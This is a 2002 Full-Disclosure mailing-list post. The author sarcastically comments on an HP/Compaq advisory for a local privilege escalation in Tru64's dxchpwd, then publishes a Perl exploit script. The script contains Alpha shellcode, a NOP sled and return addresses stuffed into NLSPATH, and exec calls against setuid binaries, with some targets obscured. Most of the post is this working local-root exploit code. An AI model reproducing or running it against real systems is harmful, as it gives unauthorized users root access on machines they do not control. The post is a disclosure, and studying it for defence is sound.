[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001f01c23cb5$6a9a4f00$0301000a@k7ezizjvt9gjdv>
From: dotslash at snosoft.com (KF)
Subject: In regards to ... http://online.securityfocus.com/bid/5382
In regards to ... http://online.securityfocus.com/bid/5382 and
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README
- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why medium? Because the public had not seen an exploit?
This ECO has not been through an exhaustive field test process.
Due to the experimental stage of this ECO/workaround, Hewlett-Packard
makes no representations regarding its use or performance. The
customer shall have the sole responsibility for adequate protection
and back-up data used in conjunction with this ECO/workaround.
^--- hrmm cute.
I think I can make one of those right quick too.
This SNOSoft Proof of Concept Tool has not been through an exhaustive
field test process. Due to the experimental stage of this Tool, SNOSoft
makes no representations regarding its use or performance. The
customer of Compaq / HP shall have the sole responsibility for adequate protection
and back-up data used in conjunction with his or her own system and the use of the
following SNO/Proof of Concept Tool.
Official SNO workaround is:
See vendor or if paranoid chmod -s everything in sight.
This is supposed to be the vendor fix... I have not tested it. I assume with the
coordination from CERT and the concious decision to release a public patch
that the vendor has provided a good workaround.
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README
Please note after all the public drama with HP look whos name ends up in the credit section. *grin*
Good find guys... lets give the HP dev staff a round of applause. *sarcasm*
Tru64 DXCHPWD Local Privilege Escalation Vulnerability
Credit:
Published in a Compaq security advisory.
Hrmm how nice of them to mention us.
I will give someone a cookie if they can tell me when NLSPATH was first a big issue on OTHER unix systems.
I hope this isn't broken... if it is don't whine to me ... fix it.
--- begin copyrighted material
#!/usr/bin/perl -w
#
# stripey (stripey@...soft.com)
#
# This code is copyrighted by Snosoft
# http://www.snosoft.com
# If you are a direct employee of HP or Compaq
# you are not aloud to look at this program or use it.
# in order to protect our copyright on this
# program we have crippled it (at least) by adding
# _IWORKATHP to some part of the code.If
# you do not work for HP or Compaq you may
# remove these letters at will provided this copyright notice
# remains attached to the header of this code. .
# As stated above if you work at hp you should
# not even be reading at this point. However if
# you are please note that by removing the letters
# _IWORKATHP from this document you are violating
# the DMCA section 1201(a)
# Also Please note that most of the targets in
# this are removed pending CERT releases.
$tgts{"0"} = pack("l",0x40010c04).":/usr/dt/bin/SORRY";
$tgts{"1"} = pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";
$tgts{"2"} = pack("l",0x40014280).":/usr/sbin/HRMMM";
$tgts{"3"} = pack("l",0x4003c190).":/usr/bin/LALALALAL";
$tgts{"4"} = pack("l",0x400361f0).":/usr/bin/HARHAR";
$tgts{"5"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";
$tgts{"6"} = pack("l",0x400120b0).":/usr/bin/OOPS";
$tgts{"7"} = pack("l",0x400105e8).":/usr/bin/DECLANR0X";
unless (($target,$offset,$align) = @ARGV,$align) {
print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key. $b\n";
}
print "\n";
exit 1;
}
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
# GOBBLES someday I will switch gears in the sweat shop and
# get that shellcode wrote uo. That was quite the entertaining
# talk or speach or whatever this weekend.
# shellcode by Taeho Oh
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$tlen = (1024-(length($sc)))/4;
$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;
$ENV{"NLSPATH"} = $buf;
if ($target == 7) { print "Hit ctrl-d...\n"; }
if ($target == 6) {
exec("$b","-d","a=asdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");
} else {
exec("$b");
}
---- end copyrighted material
-KF
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020805/7c37dc16/attachment.html
Powered by blists - more mailing lists